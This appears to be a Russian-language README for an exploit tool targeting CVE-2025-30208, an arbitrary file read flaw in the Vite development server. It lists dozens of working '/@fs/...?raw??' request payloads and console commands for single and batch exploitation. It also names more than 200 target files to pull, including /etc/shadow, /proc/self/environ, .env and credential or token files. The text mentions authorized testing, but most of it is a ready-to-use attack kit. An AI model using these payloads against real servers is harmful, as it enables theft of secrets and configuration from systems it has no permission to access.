
CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда).
Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня
Профессиональный инструмент для тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов Vite
🚀 Быстрый старт • 📋 Особенности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность
Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 на серверах разработки Vite. Уязвимость позволяет произвольное чтение файлов через конечные точки файловой системы Vite, потенциально раскрывая конфиденциальные файлы конфигурации, исходный код и системную информацию.
Инструмент теперь имеет модульную архитектуру для лучшей поддерживаемости и расширяемости:
CVE-2025-30208.py — Основное приложение сканераpayloads.py — Продвинутые полезные нагрузки для эксплуатации (60+ вариаций)sensitive_files.py — Комплексная база конфиденциальных файлов (200+ файлов)html_template.py — Улучшенный шаблон HTML-отчёта в стиле хакераpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Включить подробный режим для детального вывода
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Нажмите Enter дважды для завершения]
CVE-2025-30208 > scan
# Настройка прокси
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Установка пользовательских заголовков
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Настройка ограничения скорости
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Создать красивый HTML-отчёт
CVE-2025-30208 > pull
# Запустить веб-сервер для просмотра отчёта
CVE-2025-30208 > web
# Запустить веб-сервер на определённом порту
CVE-2025-30208 > web 8081
# Остановить веб-сервер
CVE-2025-30208 > web off
Теперь сканер использует более 60 различных вариаций полезных нагрузок, организованных в payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
Инструмент теперь проверяет более 200 конфиденциальных файлов, организованных в sensitive_files.py:
/etc/passwd — Информация об учётных записях пользователей/etc/shadow — Зашифрованные данные паролей/etc/services — Сетевые службы/etc/hosts — Сопоставления имён хостов/etc/fstab — Таблица файловой системы/etc/ssh/sshd_config — Конфигурация SSH-сервера/etc/crontab — Системные задачи cron/etc/sudoers — Конфигурация sudo/proc/version — Версия ядра/proc/cpuinfo — Информация о CPU/proc/meminfo — Информация о памяти/proc/self/environ — Окружение процесса/proc/self/cmdline — Командная строка процесса/proc/net/tcp — TCP-соединения/proc/net/udp — UDP-соединения.env — Переменные окружения.env.local — Локальное окружение.env.production — Продуктовое окружениеconfig.json — Конфигурация приложенияsettings.json — Настройки приложенияapplication.properties — Конфигурация Springapplication.yml — YAML-конфигурацияdatabase.yml — Конфигурация базы данныхsecrets.json — Управление секретамиpackage.json — Зависимости Node.jspackage-lock.json — Заблокированные зависимостиyarn.lock — Файл блокировки Yarnvite.config.js — Конфигурация Vitevite.config.ts — TypeScript конфигурация Vitetsconfig.json — Конфигурация TypeScriptwebpack.config.js — Конфигурация Webpacknext.config.js — Конфигурация Next.jsnuxt.config.js — Конфигурация Nuxt.jsangular.json — Конфигурация Angularvue.config.js — Конфигурация Vue.jsrollup.config.js — Конфигурация Rollupeslint.config.js — Конфигурация ESLint.git/config — Конфигурация Git.gitignore — Правила игнорирования Git.gitattributes — Атрибуты Git.gitmodules — Подмодули Git.git/HEAD — Текущая ветка.git/logs/HEAD — Журналы Git.git/refs/heads/master — Ветка master.git/refs/heads/main — Ветка mainREADME.md — Документация проектаCHANGELOG.md — Журнал измененийLICENSE — Информация о лицензииCONTRIBUTING.md — Рекомендации по участиюAUTHORS — Информация об авторахTODO.md — Список задачROADMAP.md — План развитияDockerfile — Конфигурация Dockerdocker-compose.yml — Docker Composedocker-compose.override.yml — Конфигурация переопределения.dockerignore — Правила игнорирования Dockerdocker-compose.prod.yml — Продуктовая конфигурацияdocker-compose.dev.yml — Конфигурация разработкиnginx.conf — Конфигурация Nginxapache2.conf — Конфигурация Apachehttpd.conf — Конфигурация HTTP-демона.htaccess — Управление доступом Apacheweb.config — Конфигурация IISrobots.txt — Директивы для поисковых системsitemap.xml — Структура сайтаmanifest.json — Манифест веб-приложенияsw.js — Service Workerfirebase.json — Конфигурация Firebasefirebase.rules — Правила безопасности Firebaseboot.ini — Конфигурация загрузкиautoexec.bat — Скрипт автозапускаsystem.ini — Системная конфигурацияwin.ini — Конфигурация WindowsUsers — Каталоги пользователейWindows — Системные файлыProgram Files — Каталоги приложенийSystem — Системные файлыLibrary — Библиотечные файлыApplications — Файлы приложенийprivate/etc/hosts — Файл hostsprivate/etc/passwd — Учётные записи пользователейdatabase.db — База данных SQLitedatabase.sqlite — База данных SQLitedata.db — База данных данныхdump.sql — Дамп базы данныхschema.sql — Схема базы данныхmigrations — Миграции базы данныхlogs — Директория журналовerror.log — Журналы ошибокaccess.log — Журналы доступаapp.log — Журналы приложенияdebug.log — Отладочные журналыcombined.log — Комбинированные журналыbackup — Директория резервных копийbackup.sql — Резервная копия базы данныхbackup.zip — Сжатая резервная копияdump — Дамп данныхexport — Экспорт данныхauth.json — Конфигурация аутентификацииcredentials.json — Хранилище учётных данныхkeys.json — Управление ключамиtokens.json — Хранилище токеновjwt.json — Конфигурация JWToauth.json — Конфигурация OAuthapi.json — Конфигурация APIswagger.json — Документация APIopenapi.json — Спецификация OpenAPIgraphql.json — Конфигурация GraphQLschema.json — Схема APIcloudformation.yml — AWS CloudFormationserverless.yml — Конфигурация Serverlessterraform.tf — Конфигурация Terraformkubernetes.yml — Конфигурация Kubernetesk8s.yml — Конфигурация Kubernetesanalytics.json — Конфигурация аналитикиmonitoring.json — Настройка мониторингаmetrics.json — Конфигурация метрикtelemetry.json — Данные телеметрииИнструмент теперь генерирует красивые HTML-отчёты в стиле хакера с:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Основное приложение сканера
├── payloads.py # Продвинутые полезные нагрузки для эксплуатации (60+)
├── sensitive_files.py # База конфиденциальных файлов (200+)
├── html_template.py # Улучшенный шаблон HTML-отчёта
├── README.md # Эта документация
├── requirements.txt # Зависимости Python
├── logs/ # Директория файлов журналов
├── data_leak.html # Сгенерированные HTML-отчёты
├── data_leak.json # Сгенерированные JSON-отчёты
└── session.json # Сохранённые конфигурации сеансов
Мы приветствуем вклад в улучшение этого инструмента:
payloads.pysensitive_files.pyhtml_template.pyЭтот проект лицензирован только для образовательных целей и авторизованного тестирования безопасности.
⚠️ Юридическое предупреждение: Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут ответственность за обеспечение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за любое неправомерное использование этого инструмента.
⭐ Если этот инструмент помог вам, пожалуйста, поставьте ему звезду! ⭐
Сделано с ❤️ для сообщества безопасности
| Команда | Описание | Пример |
|---|
set <опция> <значение> | Установить параметры конфигурации | set RHOST 192.168.1.100 |
show options | Показать текущие настройки | show options |
edit | Интерактивный редактор опций | edit |
run / exploit | Запустить тест на уязвимость | run |
batch | Пакетное сканирование нескольких целей | batch |
scan | Обнаружить конфиденциальные файлы | scan |
pull | Экспортировать результаты в HTML/JSON | pull |
web [on|off|port] | Веб-сервер для HTML-отчётов | web 8080 |
save | Сохранить конфигурацию сеанса | save |
load | Загрузить конфигурацию сеанса | load |
test | Проверить подключение к цели | test |
validate | Проверить текущую конфигурацию | validate |
verbose | Переключить подробный режим | verbose |
proxy | Настроить параметры прокси | proxy |
headers | Установить пользовательские HTTP-заголовки | headers |
rate | Настроить ограничение скорости | rate |
log | Показать информацию журнала | log |
help / ? | Показать справку | help |
exit / quit | Выйти из инструмента | exit |
| Опция | Описание | По умолчанию | Валидация |
|---|
RHOST | Целевой хост/IP-адрес | - | Валидация имени хоста/IP |
RPORT | Номер порта цели | - | Диапазон портов (1-65535) |
FILEPATH | Путь к файлу для тестирования | etc/passwd | Валидация пути |
PROXY | URL HTTP/HTTPS прокси | - | Валидация формата URL |
VERBOSE | Включить подробный вывод | false | Логическая валидация |
RATE_LIMIT | Задержка между запросами (секунды) | 0.3 | Числовая валидация |
THREADS | Количество потоков для пакетного сканирования | 5 | Целочисленная валидация |
TIMEOUT | Тайм-аут запроса (секунды) | 5 | Целочисленная валидация |
CUSTOM_HEADERS | Пользовательские HTTP-заголовки (JSON) | {} | Валидация формата JSON |
prettier.config.js — Конфигурация Prettierjest.config.js — Конфигурация Jestbabel.config.js — Конфигурация Babeltailwind.config.js — Конфигурация Tailwind CSS| Файл | Описание | Формат |
|---|
data_leak.html | Улучшенный HTML-отчёт об уязвимости в стиле хакера | HTML |
data_leak.json | Структурированный экспорт в JSON | JSON |
sensitive_files_discovery.json | Обнаруженные конфиденциальные файлы | JSON |
session.json | Сохранённая конфигурация сеанса | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Детальные аудиторские журналы | Текст |